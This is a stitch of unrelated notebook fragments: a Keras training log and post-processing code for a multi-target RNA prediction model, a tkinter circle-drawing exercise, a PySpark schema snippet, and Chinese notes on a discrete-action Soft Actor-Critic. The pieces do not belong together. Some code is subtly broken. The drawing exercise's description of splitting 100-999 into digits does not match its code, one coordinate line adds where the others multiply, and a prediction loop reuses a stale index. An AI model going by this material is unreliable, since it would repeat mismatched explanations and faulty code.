120/120 - 9s - loss: 8.9648 - output_react_loss: 0.9398 - output_bg_ph_loss: 1.1487 - output_ph_loss: 1.3266 - output_mg_c_loss: 1.1680 - output_c_loss: 1.1252 - val_loss: 6.6904 - val_output_react_loss: 0.7636 - val_output_bg_ph_loss: 0.9520 - val_output_ph_loss: 0.8665 - val_output_mg_c_loss: 0.8282 - val_output_c_loss: 0.7363
Epoch 2/70
120/120 - 7s - loss: 7.6799 - output_react_loss: 0.8094 - output_bg_ph_loss: 0.9836 - output_ph_loss: 1.1459 - output_mg_c_loss: 0.9768 - output_c_loss: 0.9945 - val_loss: 6.0158 - val_output_react_loss: 0.7012 - val_output_bg_ph_loss: 0.8336 - val_output_ph_loss: 0.7948 - val_output_mg_c_loss: 0.7338 - val_output_c_loss: 0.6837
Epoch 3/70
120/120 - 7s - loss: 7.2897 - output_react_loss: 0.7810 - output_bg_ph_loss: 0.9158 - output_ph_loss: 1.1226 - output_mg_c_loss: 0.9056 - output_c_loss: 0.9623 - val_loss: 5.5349 - val_output_react_loss: 0.6677 - val_output_bg_ph_loss: 0.7701 - val_output_ph_loss: 0.7270 - val_output_mg_c_loss: 0.6577 - val_output_c_loss: 0.6171
Epoch 4/70
120/120 - 7s - loss: 6.7767 - output_react_loss: 0.7432 - output_bg_ph_loss: 0.8430 - output_ph_loss: 1.0224 - output_mg_c_loss: 0.8412 - output_c_loss: 0.8995 - val_loss: 5.2177 - val_output_react_loss: 0.6327 - val_output_bg_ph_loss: 0.7224 - val_output_ph_loss: 0.6922 - val_output_mg_c_loss: 0.6148 - val_output_c_loss: 0.5860
Epoch 5/70
120/120 - 7s - loss: 6.5807 - output_react_loss: 0.7253 - output_bg_ph_loss: 0.8228 - output_ph_loss: 1.0071 - output_mg_c_loss: 0.8073 - output_c_loss: 0.8630 - val_loss: 5.0784 - val_output_react_loss: 0.6096 - val_output_bg_ph_loss: 0.7026 - val_output_ph_loss: 0.6803 - val_output_mg_c_loss: 0.5995 - val_output_c_loss: 0.5747
Epoch 6/70
120/120 - 7s - loss: 6.3022 - output_react_loss: 0.6965 - output_bg_ph_loss: 0.7873 - output_ph_loss: 0.9594 - output_mg_c_loss: 0.7747 - output_c_loss: 0.8259 - val_loss: 4.9445 - val_output_react_loss: 0.5908 - val_output_bg_ph_loss: 0.6836 - val_output_ph_loss: 0.6573 - val_output_mg_c_loss: 0.5859 - val_output_c_loss: 0.5667
Epoch 7/70
120/120 - 8s - loss: 6.1569 - output_react_loss: 0.6795 - output_bg_ph_loss: 0.7661 - output_ph_loss: 0.9470 - output_mg_c_loss: 0.7474 - output_c_loss: 0.8241 - val_loss: 4.9766 - val_output_react_loss: 0.5834 - val_output_bg_ph_loss: 0.7018 - val_output_ph_loss: 0.6614 - val_output_mg_c_loss: 0.5918 - val_output_c_loss: 0.5612
Epoch 8/70
120/120 - 7s - loss: 6.1745 - output_react_loss: 0.6824 - output_bg_ph_loss: 0.7600 - output_ph_loss: 0.9654 - output_mg_c_loss: 0.7405 - output_c_loss: 0.8432 - val_loss: 4.8558 - val_output_react_loss: 0.5759 - val_output_bg_ph_loss: 0.6690 - val_output_ph_loss: 0.6489 - val_output_mg_c_loss: 0.5753 - val_output_c_loss: 0.5665
Epoch 9/70
120/120 - 7s - loss: 5.7238 - output_react_loss: 0.6377 - output_bg_ph_loss: 0.7138 - output_ph_loss: 0.8751 - output_mg_c_loss: 0.6886 - output_c_loss: 0.7685 - val_loss: 4.8555 - val_output_react_loss: 0.5673 - val_output_bg_ph_loss: 0.6788 - val_output_ph_loss: 0.6493 - val_output_mg_c_loss: 0.5792 - val_output_c_loss: 0.5556
Epoch 10/70
120/120 - 7s - loss: 5.7590 - output_react_loss: 0.6336 - output_bg_ph_loss: 0.7089 - output_ph_loss: 0.8894 - output_mg_c_loss: 0.6956 - output_c_loss: 0.7936 - val_loss: 4.7163 - val_output_react_loss: 0.5526 - val_output_bg_ph_loss: 0.6563 - val_output_ph_loss: 0.6365 - val_output_mg_c_loss: 0.5557 - val_output_c_loss: 0.5506
Epoch 11/70
120/120 - 7s - loss: 5.5815 - output_react_loss: 0.6273 - output_bg_ph_loss: 0.6864 - output_ph_loss: 0.8704 - output_mg_c_loss: 0.6616 - output_c_loss: 0.7606 - val_loss: 4.6844 - val_output_react_loss: 0.5585 - val_output_bg_ph_loss: 0.6507 - val_output_ph_loss: 0.6214 - val_output_mg_c_loss: 0.5499 - val_output_c_loss: 0.5449
Epoch 12/70
120/120 - 7s - loss: 5.4826 - output_react_loss: 0.6173 - output_bg_ph_loss: 0.6596 - output_ph_loss: 0.8529 - output_mg_c_loss: 0.6578 - output_c_loss: 0.7603 - val_loss: 4.6554 - val_output_react_loss: 0.5450 - val_output_bg_ph_loss: 0.6512 - val_output_ph_loss: 0.6174 - val_output_mg_c_loss: 0.5547 - val_output_c_loss: 0.5363
Epoch 13/70
120/120 - 7s - loss: 5.3332 - output_react_loss: 0.5912 - output_bg_ph_loss: 0.6540 - output_ph_loss: 0.8383 - output_mg_c_loss: 0.6354 - output_c_loss: 0.7337 - val_loss: 4.6316 - val_output_react_loss: 0.5492 - val_output_bg_ph_loss: 0.6412 - val_output_ph_loss: 0.6162 - val_output_mg_c_loss: 0.5516 - val_output_c_loss: 0.5314
Epoch 14/70
120/120 - 8s - loss: 5.3117 - output_react_loss: 0.5859 - output_bg_ph_loss: 0.6470 - output_ph_loss: 0.8433 - output_mg_c_loss: 0.6317 - output_c_loss: 0.7391 - val_loss: 4.5633 - val_output_react_loss: 0.5350 - val_output_bg_ph_loss: 0.6353 - val_output_ph_loss: 0.6074 - val_output_mg_c_loss: 0.5415 - val_output_c_loss: 0.5322
Epoch 15/70
120/120 - 8s - loss: 5.3218 - output_react_loss: 0.5974 - output_bg_ph_loss: 0.6333 - output_ph_loss: 0.8453 - output_mg_c_loss: 0.6272 - output_c_loss: 0.7607 - val_loss: 4.6204 - val_output_react_loss: 0.5386 - val_output_bg_ph_loss: 0.6468 - val_output_ph_loss: 0.6139 - val_output_mg_c_loss: 0.5522 - val_output_c_loss: 0.5313
Epoch 16/70
120/120 - 7s - loss: 5.2437 - output_react_loss: 0.5836 - output_bg_ph_loss: 0.6251 - output_ph_loss: 0.8358 - output_mg_c_loss: 0.6188 - output_c_loss: 0.7528 - val_loss: 4.5869 - val_output_react_loss: 0.5374 - val_output_bg_ph_loss: 0.6370 - val_output_ph_loss: 0.6171 - val_output_mg_c_loss: 0.5449 - val_output_c_loss: 0.5311
Epoch 17/70
120/120 - 7s - loss: 5.0213 - output_react_loss: 0.5595 - output_bg_ph_loss: 0.5995 - output_ph_loss: 0.8040 - output_mg_c_loss: 0.5927 - output_c_loss: 0.7138 - val_loss: 4.5759 - val_output_react_loss: 0.5357 - val_output_bg_ph_loss: 0.6397 - val_output_ph_loss: 0.6064 - val_output_mg_c_loss: 0.5432 - val_output_c_loss: 0.5324
Epoch 18/70
120/120 - 7s - loss: 4.8916 - output_react_loss: 0.5412 - output_bg_ph_loss: 0.5869 - output_ph_loss: 0.7755 - output_mg_c_loss: 0.5758 - output_c_loss: 0.7082 - val_loss: 4.5692 - val_output_react_loss: 0.5379 - val_output_bg_ph_loss: 0.6415 - val_output_ph_loss: 0.6044 - val_output_mg_c_loss: 0.5391 - val_output_c_loss: 0.5278
Epoch 19/70
Epoch 00019: ReduceLROnPlateau reducing learning rate to 0.00010000000474974513.
120/120 - 7s - loss: 4.8882 - output_react_loss: 0.5382 - output_bg_ph_loss: 0.5824 - output_ph_loss: 0.7907 - output_mg_c_loss: 0.5734 - output_c_loss: 0.7095 - val_loss: 4.5903 - val_output_react_loss: 0.5373 - val_output_bg_ph_loss: 0.6393 - val_output_ph_loss: 0.6124 - val_output_mg_c_loss: 0.5453 - val_output_c_loss: 0.5340
Epoch 20/70
120/120 - 7s - loss: 4.7543 - output_react_loss: 0.5258 - output_bg_ph_loss: 0.5629 - output_ph_loss: 0.7631 - output_mg_c_loss: 0.5556 - output_c_loss: 0.7027 - val_loss: 4.4704 - val_output_react_loss: 0.5217 - val_output_bg_ph_loss: 0.6260 - val_output_ph_loss: 0.5967 - val_output_mg_c_loss: 0.5295 - val_output_c_loss: 0.5194
Epoch 21/70
120/120 - 7s - loss: 4.6307 - output_react_loss: 0.5109 - output_bg_ph_loss: 0.5473 - output_ph_loss: 0.7462 - output_mg_c_loss: 0.5416 - output_c_loss: 0.6850 - val_loss: 4.4541 - val_output_react_loss: 0.5213 - val_output_bg_ph_loss: 0.6222 - val_output_ph_loss: 0.5931 - val_output_mg_c_loss: 0.5274 - val_output_c_loss: 0.5190
Epoch 22/70
120/120 - 7s - loss: 4.7757 - output_react_loss: 0.5252 - output_bg_ph_loss: 0.5555 - output_ph_loss: 0.7932 - output_mg_c_loss: 0.5553 - output_c_loss: 0.7104 - val_loss: 4.4514 - val_output_react_loss: 0.5215 - val_output_bg_ph_loss: 0.6220 - val_output_ph_loss: 0.5926 - val_output_mg_c_loss: 0.5263 - val_output_c_loss: 0.5191
Epoch 23/70
120/120 - 8s - loss: 4.6922 - output_react_loss: 0.5121 - output_bg_ph_loss: 0.5512 - output_ph_loss: 0.7699 - output_mg_c_loss: 0.5475 - output_c_loss: 0.7008 - val_loss: 4.4529 - val_output_react_loss: 0.5212 - val_output_bg_ph_loss: 0.6217 - val_output_ph_loss: 0.5935 - val_output_mg_c_loss: 0.5273 - val_output_c_loss: 0.5190
Epoch 24/70
120/120 - 7s - loss: 4.7715 - output_react_loss: 0.5251 - output_bg_ph_loss: 0.5536 - output_ph_loss: 0.7821 - output_mg_c_loss: 0.5579 - output_c_loss: 0.7160 - val_loss: 4.4516 - val_output_react_loss: 0.5199 - val_output_bg_ph_loss: 0.6236 - val_output_ph_loss: 0.5938 - val_output_mg_c_loss: 0.5260 - val_output_c_loss: 0.5187
Epoch 25/70
120/120 - 7s - loss: 4.4517 - output_react_loss: 0.4876 - output_bg_ph_loss: 0.5274 - output_ph_loss: 0.7290 - output_mg_c_loss: 0.5185 - output_c_loss: 0.6555 - val_loss: 4.4539 - val_output_react_loss: 0.5215 - val_output_bg_ph_loss: 0.6226 - val_output_ph_loss: 0.5915 - val_output_mg_c_loss: 0.5279 - val_output_c_loss: 0.5184
Epoch 26/70
120/120 - 7s - loss: 4.6458 - output_react_loss: 0.5124 - output_bg_ph_loss: 0.5382 - output_ph_loss: 0.7634 - output_mg_c_loss: 0.5398 - output_c_loss: 0.7015 - val_loss: 4.4547 - val_output_react_loss: 0.5210 - val_output_bg_ph_loss: 0.6227 - val_output_ph_loss: 0.5934 - val_output_mg_c_loss: 0.5278 - val_output_c_loss: 0.5182
Epoch 27/70
120/120 - 7s - loss: 4.5106 - output_react_loss: 0.4968 - output_bg_ph_loss: 0.5324 - output_ph_loss: 0.7305 - output_mg_c_loss: 0.5255 - output_c_loss: 0.6708 - val_loss: 4.4500 - val_output_react_loss: 0.5203 - val_output_bg_ph_loss: 0.6214 - val_output_ph_loss: 0.5913 - val_output_mg_c_loss: 0.5281 - val_output_c_loss: 0.5190
Epoch 28/70
120/120 - 7s - loss: 4.6403 - output_react_loss: 0.5107 - output_bg_ph_loss: 0.5368 - output_ph_loss: 0.7640 - output_mg_c_loss: 0.5427 - output_c_loss: 0.6960 - val_loss: 4.4483 - val_output_react_loss: 0.5201 - val_output_bg_ph_loss: 0.6215 - val_output_ph_loss: 0.5918 - val_output_mg_c_loss: 0.5270 - val_output_c_loss: 0.5192
Epoch 29/70
120/120 - 7s - loss: 4.4913 - output_react_loss: 0.4889 - output_bg_ph_loss: 0.5276 - output_ph_loss: 0.7353 - output_mg_c_loss: 0.5262 - output_c_loss: 0.6706 - val_loss: 4.4535 - val_output_react_loss: 0.5199 - val_output_bg_ph_loss: 0.6213 - val_output_ph_loss: 0.5946 - val_output_mg_c_loss: 0.5287 - val_output_c_loss: 0.5192
Epoch 30/70
120/120 - 7s - loss: 4.5325 - output_react_loss: 0.4932 - output_bg_ph_loss: 0.5301 - output_ph_loss: 0.7476 - output_mg_c_loss: 0.5284 - output_c_loss: 0.6813 - val_loss: 4.4534 - val_output_react_loss: 0.5200 - val_output_bg_ph_loss: 0.6227 - val_output_ph_loss: 0.5932 - val_output_mg_c_loss: 0.5280 - val_output_c_loss: 0.5190
Epoch 31/70
120/120 - 7s - loss: 4.6655 - output_react_loss: 0.5160 - output_bg_ph_loss: 0.5454 - output_ph_loss: 0.7764 - output_mg_c_loss: 0.5364 - output_c_loss: 0.6935 - val_loss: 4.4497 - val_output_react_loss: 0.5211 - val_output_bg_ph_loss: 0.6212 - val_output_ph_loss: 0.5921 - val_output_mg_c_loss: 0.5267 - val_output_c_loss: 0.5194
Epoch 32/70
120/120 - 7s - loss: 4.5931 - output_react_loss: 0.4959 - output_bg_ph_loss: 0.5323 - output_ph_loss: 0.7595 - output_mg_c_loss: 0.5395 - output_c_loss: 0.6981 - val_loss: 4.4446 - val_output_react_loss: 0.5206 - val_output_bg_ph_loss: 0.6205 - val_output_ph_loss: 0.5926 - val_output_mg_c_loss: 0.5264 - val_output_c_loss: 0.5169
Epoch 33/70
120/120 - 7s - loss: 4.3964 - output_react_loss: 0.4823 - output_bg_ph_loss: 0.5141 - output_ph_loss: 0.7203 - output_mg_c_loss: 0.5127 - output_c_loss: 0.6580 - val_loss: 4.4553 - val_output_react_loss: 0.5209 - val_output_bg_ph_loss: 0.6214 - val_output_ph_loss: 0.5944 - val_output_mg_c_loss: 0.5288 - val_output_c_loss: 0.5187
Epoch 34/70
120/120 - 7s - loss: 4.4073 - output_react_loss: 0.4855 - output_bg_ph_loss: 0.5156 - output_ph_loss: 0.7207 - output_mg_c_loss: 0.5123 - output_c_loss: 0.6599 - val_loss: 4.4478 - val_output_react_loss: 0.5195 - val_output_bg_ph_loss: 0.6226 - val_output_ph_loss: 0.5909 - val_output_mg_c_loss: 0.5271 - val_output_c_loss: 0.5185
Epoch 35/70
120/120 - 7s - loss: 4.5178 - output_react_loss: 0.4913 - output_bg_ph_loss: 0.5249 - output_ph_loss: 0.7517 - output_mg_c_loss: 0.5276 - output_c_loss: 0.6785 - val_loss: 4.4527 - val_output_react_loss: 0.5213 - val_output_bg_ph_loss: 0.6228 - val_output_ph_loss: 0.5934 - val_output_mg_c_loss: 0.5263 - val_output_c_loss: 0.5185
Epoch 36/70
120/120 - 7s - loss: 4.4502 - output_react_loss: 0.4907 - output_bg_ph_loss: 0.5147 - output_ph_loss: 0.7224 - output_mg_c_loss: 0.5196 - output_c_loss: 0.6778 - val_loss: 4.4616 - val_output_react_loss: 0.5224 - val_output_bg_ph_loss: 0.6234 - val_output_ph_loss: 0.5936 - val_output_mg_c_loss: 0.5286 - val_output_c_loss: 0.5192
Epoch 37/70
120/120 - 7s - loss: 4.5019 - output_react_loss: 0.4848 - output_bg_ph_loss: 0.5232 - output_ph_loss: 0.7487 - output_mg_c_loss: 0.5269 - output_c_loss: 0.6834 - val_loss: 4.4388 - val_output_react_loss: 0.5192 - val_output_bg_ph_loss: 0.6203 - val_output_ph_loss: 0.5906 - val_output_mg_c_loss: 0.5255 - val_output_c_loss: 0.5183
Epoch 38/70
120/120 - 7s - loss: 4.6008 - output_react_loss: 0.4989 - output_bg_ph_loss: 0.5318 - output_ph_loss: 0.7743 - output_mg_c_loss: 0.5331 - output_c_loss: 0.6988 - val_loss: 4.4428 - val_output_react_loss: 0.5200 - val_output_bg_ph_loss: 0.6201 - val_output_ph_loss: 0.5913 - val_output_mg_c_loss: 0.5270 - val_output_c_loss: 0.5173
Epoch 39/70
120/120 - 7s - loss: 4.4832 - output_react_loss: 0.4915 - output_bg_ph_loss: 0.5185 - output_ph_loss: 0.7407 - output_mg_c_loss: 0.5242 - output_c_loss: 0.6742 - val_loss: 4.4557 - val_output_react_loss: 0.5196 - val_output_bg_ph_loss: 0.6228 - val_output_ph_loss: 0.5949 - val_output_mg_c_loss: 0.5282 - val_output_c_loss: 0.5195
Epoch 40/70
120/120 - 7s - loss: 4.3365 - output_react_loss: 0.4731 - output_bg_ph_loss: 0.5059 - output_ph_loss: 0.7114 - output_mg_c_loss: 0.5005 - output_c_loss: 0.6661 - val_loss: 4.4675 - val_output_react_loss: 0.5215 - val_output_bg_ph_loss: 0.6240 - val_output_ph_loss: 0.5943 - val_output_mg_c_loss: 0.5309 - val_output_c_loss: 0.5204
Epoch 41/70
120/120 - 7s - loss: 4.4591 - output_react_loss: 0.4814 - output_bg_ph_loss: 0.5189 - output_ph_loss: 0.7371 - output_mg_c_loss: 0.5184 - output_c_loss: 0.6846 - val_loss: 4.4509 - val_output_react_loss: 0.5202 - val_output_bg_ph_loss: 0.6215 - val_output_ph_loss: 0.5925 - val_output_mg_c_loss: 0.5280 - val_output_c_loss: 0.5189
Epoch 42/70
Epoch 00042: ReduceLROnPlateau reducing learning rate to 1.0000000474974514e-05.
120/120 - 7s - loss: 4.4446 - output_react_loss: 0.4837 - output_bg_ph_loss: 0.5138 - output_ph_loss: 0.7438 - output_mg_c_loss: 0.5199 - output_c_loss: 0.6659 - val_loss: 4.4508 - val_output_react_loss: 0.5199 - val_output_bg_ph_loss: 0.6217 - val_output_ph_loss: 0.5920 - val_output_mg_c_loss: 0.5283 - val_output_c_loss: 0.5190
Epoch 43/70
120/120 - 7s - loss: 4.3063 - output_react_loss: 0.4751 - output_bg_ph_loss: 0.4987 - output_ph_loss: 0.7046 - output_mg_c_loss: 0.4995 - output_c_loss: 0.6551 - val_loss: 4.4425 - val_output_react_loss: 0.5194 - val_output_bg_ph_loss: 0.6206 - val_output_ph_loss: 0.5911 - val_output_mg_c_loss: 0.5265 - val_output_c_loss: 0.5182
Epoch 44/70
120/120 - 7s - loss: 4.4064 - output_react_loss: 0.4764 - output_bg_ph_loss: 0.5094 - output_ph_loss: 0.7278 - output_mg_c_loss: 0.5196 - output_c_loss: 0.6679 - val_loss: 4.4411 - val_output_react_loss: 0.5194 - val_output_bg_ph_loss: 0.6206 - val_output_ph_loss: 0.5908 - val_output_mg_c_loss: 0.5261 - val_output_c_loss: 0.5180
Epoch 45/70
120/120 - 7s - loss: 4.4373 - output_react_loss: 0.4823 - output_bg_ph_loss: 0.5169 - output_ph_loss: 0.7386 - output_mg_c_loss: 0.5150 - output_c_loss: 0.6702 - val_loss: 4.4420 - val_output_react_loss: 0.5194 - val_output_bg_ph_loss: 0.6208 - val_output_ph_loss: 0.5907 - val_output_mg_c_loss: 0.5264 - val_output_c_loss: 0.5180
Epoch 46/70
120/120 - 7s - loss: 4.4963 - output_react_loss: 0.4870 - output_bg_ph_loss: 0.5140 - output_ph_loss: 0.7410 - output_mg_c_loss: 0.5299 - output_c_loss: 0.6936 - val_loss: 4.4415 - val_output_react_loss: 0.5199 - val_output_bg_ph_loss: 0.6206 - val_output_ph_loss: 0.5905 - val_output_mg_c_loss: 0.5261 - val_output_c_loss: 0.5178
Epoch 47/70
Restoring model weights from the end of the best epoch.
Epoch 00047: ReduceLROnPlateau reducing learning rate to 1.0000000656873453e-06.
120/120 - 8s - loss: 4.4492 - output_react_loss: 0.4823 - output_bg_ph_loss: 0.5137 - output_ph_loss: 0.7492 - output_mg_c_loss: 0.5126 - output_c_loss: 0.6827 - val_loss: 4.4389 - val_output_react_loss: 0.5192 - val_output_bg_ph_loss: 0.6203 - val_output_ph_loss: 0.5904 - val_output_mg_c_loss: 0.5258 - val_output_c_loss: 0.5177
Epoch 00047: early stopping
###Markdown
Model loss graph
###Code
for fold, history in enumerate(history_list):
print(f'\nFOLD: {fold+1}')
min_valid_idx = np.array(history['val_loss']).argmin()
print(f"Train {np.array(history['loss'])[min_valid_idx]:.5f} Validation {np.array(history['val_loss'])[min_valid_idx]:.5f}")
plot_metrics_agg(history_list)
###Output
FOLD: 1
Train 4.08940 Validation 4.55253
FOLD: 2
Train 3.78819 Validation 4.34760
FOLD: 3
Train 4.06594 Validation 4.46747
FOLD: 4
Train 4.15711 Validation 4.50378
FOLD: 5
Train 4.50192 Validation 4.43876
###Markdown
Post-processing
###Code
# Assign preds to OOF set
for idx, col in enumerate(pred_cols):
val = oof_preds[:, :, idx]
oof = oof.assign(**{f'{col}_pred': list(val)})
oof.to_csv('oof.csv', index=False)
oof_preds_dict = {}
for col in pred_cols:
oof_preds_dict[col] = oof_preds[:, :, idx]
# Assign values to test set
preds_ls = []
for df, preds in [(public_test, test_public_preds), (private_test, test_private_preds)]:
for i, uid in enumerate(df.id):
single_pred = preds[i]
single_df = pd.DataFrame(single_pred, columns=pred_cols)
single_df['id_seqpos'] = [f'{uid}_{x}' for x in range(single_df.shape[0])]
preds_ls.append(single_df)
preds_df = pd.concat(preds_ls)
###Output
_____no_output_____
###Markdown
Model evaluation
###Code
y_true_dict = get_targets_dict(train, pred_cols, train.index)
y_true = np.array([y_true_dict[col] for col in pred_cols]).transpose((1, 2, 0, 3)).reshape(oof_preds.shape)
display(evaluate_model(train, y_true, oof_preds, pred_cols))
display(evaluate_model(train, y_true, oof_preds, pred_cols, use_cols=['reactivity', 'deg_Mg_pH10', 'deg_Mg_50C']))
###Output
_____no_output_____
###Markdown
Visualize test predictions
###Code
submission = pd.read_csv(database_base_path + 'sample_submission.csv')
submission = submission[['id_seqpos']].merge(preds_df, on=['id_seqpos'])
###Output
_____no_output_____
###Markdown
Test set predictions
###Code
display(submission.head(10))
display(submission.describe())
submission.to_csv('submission.csv', index=False)
###Output
_____no_output_____ |
Python3/Anaconda-Jupyter/Python181103-059.ipynb | ###Markdown
题目:画图,综合例子。 程序分析:利用for循环控制100-999个数,每个数分解出个位,十位,百位。。程序源代码:
###Code
#!/usr/bin/python
# -*- coding: UTF-8 -*-
if __name__ == '__main__':
from tkinter import *
canvas = Canvas(width = 300,height = 300,bg = 'green')
canvas.pack(expand = YES,fill = BOTH)
x0 = 150
y0 = 100
canvas.create_oval(x0 - 10,y0 - 10,x0 + 10,y0 + 10)
canvas.create_oval(x0 - 20,y0 - 20,x0 + 20,y0 + 20)
canvas.create_oval(x0 - 50,y0 - 50,x0 + 50,y0 + 50)
import math
B = 0.809
for i in range(16):
a = 2 * math.pi / 16 * i
x = math.ceil(x0 + 48 * math.cos(a))
y = math.ceil(y0 + 48 * math.sin(a) * B)
canvas.create_line(x0,y0,x,y,fill = 'red')
canvas.create_oval(x0 - 60,y0 - 60,x0 + 60,y0 + 60)
for k in range(501):
for i in range(17):
a = (2 * math.pi / 16) * i + (2 * math.pi / 180) * k
x = math.ceil(x0 + 48 * math.cos(a))
y = math.ceil(y0 + 48 + math.sin(a) * B)
canvas.create_line(x0,y0,x,y,fill = 'red')
for j in range(51):
a = (2 * math.pi / 16) * i + (2* math.pi / 180) * k - 1
x = math.ceil(x0 + 48 * math.cos(a))
y = math.ceil(y0 + 48 * math.sin(a) * B)
canvas.create_line(x0,y0,x,y,fill = 'red')
mainloop()
###Output
_____no_output_____ |
Spark_DataSets/PySpark_DataSets/01_spark_basics_schema.ipynb | ###Markdown
Criando Schema
###Code
schema = StructType([StructField("name", StringType(), True), StructField("grade", IntegerType(), True)])
df = spark.read.json("datasets/student.json", schema=schema)
df.printSchema()
df.describe().show()
###Output
+-------+-----+-----------------+
|summary| name| grade|
+-------+-----+-----------------+
| count| 3| 3|
| mean| null|6.666666666666667|
| stddev| null|2.516611478423583|
| min| Jonh| 4|
| max|Peter| 9|
+-------+-----+-----------------+
|
algorithm_implement/soft_actor_critic/soft_actor_critic(SAC)_discrete_image.ipynb | ###Markdown
Algorithm Soft Actor-CriticFROM PAPER*****Input:** $\theta_1, \theta_2, \phi .$ $\bar{\theta}_1\leftarrow \theta_1 ,\bar{\theta}_2\leftarrow \theta_2$ $D \leftarrow \varnothing$ **for** each iteration **do** **for** each environment step **do** $a_t \sim \pi_\phi(a_t|s_t)$ $s_{t+1}\sim p(s_{t+1}|s_t, a_t)$ $D \leftarrow D\cup\{(s_t,a_t,r(s_t,a_t),s_{t+1})\}$ **end for** **for** each gradient step **do** $\theta_i\leftarrow\theta_i - \lambda_Q\hat{\nabla}_{\theta_i}J_Q(\theta_i) $ for $i\in \{1,2\}$ Update the Q-function parameters $\phi \leftarrow \phi - \lambda_\pi\hat{\nabla}_\phi J_\pi(\phi)$ Update policy weights $\psi\leftarrow \lambda_V\hat{\nabla}_\psi J_V(\psi)$ Adjust temperature $\bar{\theta}_i\leftarrow \tau\theta_i+(1-\tau)\bar{\theta}_i $ for$i\in \{1,2\}$ Update target network weights **end for** **end for****Output:** $\theta_1,\theta_2,\phi$ Main Formula:1. Soft Bellman residual:$$J_Q(\theta)=\mathbb{E}_{(s_t,a_t)\sim D}\big[\frac{1}{2}(Q_\theta(s_t,a_t)-{\cal{T}}^\pi Q(s_t,a_t))^2\big]\tag{1}$$Soft Q-value function:$${\cal{T}}^\pi Q(s_t,a_t) \triangleq r(s_t,a_t)+\gamma\mathbb{E}_{s_{t+1}\sim p}[V_\bar{\theta}(s_{t+1})]\tag{2}$$Soft state value function:$$V(s_t) = \mathbb{E}_{a_t\sim \pi}[Q(s_t,a_t)-\alpha\log\pi(a_t|s_t)]\tag{3}$$由此推出Soft Bellman residual导数:$$\hat{\nabla}_\theta J_Q(\theta)=\nabla_\theta Q_\theta(a_t,s_t)(Q_\theta(s_t,a_t)-(r(s_t,a_t)+\gamma(Q_{\bar{\theta}}(s_{t+1},a_{t+1})-\alpha\log(\pi_\phi(a_{t+1}|s_{t+1}))))\tag{4}$$2. Policy Loss:$$J_\pi(\phi)=-\mathbb{E}_{s_t\sim D}\big[\mathbb{E}_{a_t\sim \pi_\phi}[Q_\phi(s_t,a_t)-\alpha\log(\pi_\phi(a_t|s_t))]\big]\tag{5}$$又$$a_t=f_\phi(\epsilon_t;s_t),\tag{6}$$所以可写成:$$J_\pi(\phi)=-\mathbb{E}_{s_t\sim D,\;\epsilon_t\sim N}[Q_\theta(s_t,f_\phi(\epsilon_t;s_t))-\alpha\log\pi_\phi(f_\phi(\epsilon_t;s_t)|s_t)]\tag{7}$$所以其导数形式为:$$\hat{\nabla}_\phi J_\pi(\phi)=\nabla_\phi\alpha\log(\pi_\phi(a_t|s_t))+\big(\nabla_{a_t}\alpha\log(\pi_\phi(a_t|s_t))-\nabla_{a_t}Q(s_t,a_t)\big)\nabla_\phi f_\phi(\epsilon_t;s_t),\tag{8}$$3. 自适应temperature $\alpha$(论文中说$\alpha$和$Q$、$\pi$是对偶问题,有点不明白):$$\alpha^*_t=\arg {\min_{\alpha_t}}\mathbb{E}_{a_t\sim\pi^*_t}[-\alpha_t\log\pi^*_t(a_t|s_t;a_t)-\alpha_t\bar{H}]\tag{9}$$ Formula Proofs1. Proof formula $f_2(f_3)$:从最开始的动作转移开始,对于在每次$state$采取的$action$所获得的$soft\ reward$都可定义如下:$$r_{soft}(s_t,a_t)=r(s_t,a_t)+\gamma\alpha\mathbb{E}_{s_{t+1}\sim \rho}H(\pi(\cdot|s_{t+1}))\tag{10}$$将其带入到原始的$Q\ function\ : Q(s_t,a_t)=r(s_t,a_t)+\gamma\mathbb{E}_{s_{t+1},a_{t+1}}[Q(s_{t+1},a_{t+1})]$中得:$$\begin{aligned}Q_{soft}(s_t,a_t)&=r(s_t,a_t)+\gamma\alpha\mathbb{E}_{s_{t+1}\sim\rho}H(\pi(\cdot|s_{t+1}))+\gamma\mathbb{E}_{s_{t+1},a_{t+1}}[Q_{soft}(s_{t+1},a_{t+1})]\\&=r(s_t,a_t)+\gamma\mathbb{E}_{s_{t+1}\sim\rho,a_{t+1}\sim\pi}[Q_{soft}(s_{t+1},a_{t+1})]+\gamma\alpha\mathbb{E}_{s_{t+1}\sim\rho}H(\pi(\cdot|s_{t+1}))\\&=r(s_t,a_t)+\gamma\mathbb{E}_{s_{t+1}\sim\rho,a_{t+1}\sim\pi}[Q_{soft}(s_{t+1},a_{t+1})]+\gamma\mathbb{E}_{s_{t+1}\sim\rho}\mathbb{E}_{a_{t+1}\sim\pi}[-\alpha\log\pi(a_{t+1}|s_{t+1})]\\&=r(s_t,a_t)+\gamma\mathbb{E}_{s_{t+1}\sim\rho}[\mathbb{E}_{a_{t+1}\sim\pi}[Q_{soft}(s_{t+1},a_{t+1})-\alpha\log(\pi(a_{t+1}|s_{t+1}))]]\end{aligned}\tag{11}$$2. Proff formula $f$ [相对熵(KL散度)](https://blog.csdn.net/tsyccnh/article/details/79163834)对于同一个随机变量x单独的概率分布P(x)和Q(x),用来衡量其分布的差异$$D_{KL}(p||q)=\sum_{i=1}^n p(x_i)\log[\frac{p(x_i)}{q(x_i)}]$$$D_{KL}$越接近于0,$p,q$分布越接近展开得$$\begin{aligned}D_{KL}(p||q)&=\sum_{i=1}^np(x_i)\log(p(x_i))-\sum^n_{i+1}p(x_i)\log(q(x_i)) \\&=\underbrace{-H(p(x))}_{熵}+\underbrace{[-\sum^n_{i=1}p(x_i)\log(q(x_i))]}_{交叉熵}\end{aligned}$$在分类问题中,假设label为p,则前部分是不变的,即只需计算后部分,即**交叉熵** Landscape讲了那么多高深的理论,其实就是在actor和critic计算loss的时候分别考虑了entorpy,增加探索。也就是说critic既然是知道actor前进的,那么你也必须将增加探索这四个字铭记在心,不然你怎么知道actor的动作呢其次,deterministic版本的sac是没有entorpy的,因为是确定性策略所以没有entropy的来源(所以确定性策略的sac其实比TD3效果可能还要差)要有entorpy必须是normal distribution,所以其实要改成离散的动作空间,也就几行代码的事 代码实现的Tips1. 使用torch.no_grad(), 而不是.detach()更加直观 相较于SAC的五大EDIT1. 将Critic network 改为input state, output Q_value2. 将Actor network 改为softmax输出3. 将Critic更新计算Q改为根据Actor进行gather4. alpha更新通过Actor进行gather5. Actor更新乘上了每个动作的概率,以此来达到方差最小化 ---Atari环境对学习率非常敏感,1e-3和1e-4差别非常大---加上nn.BatchNorm2d(32)并不能加快学习
###Code
import torch
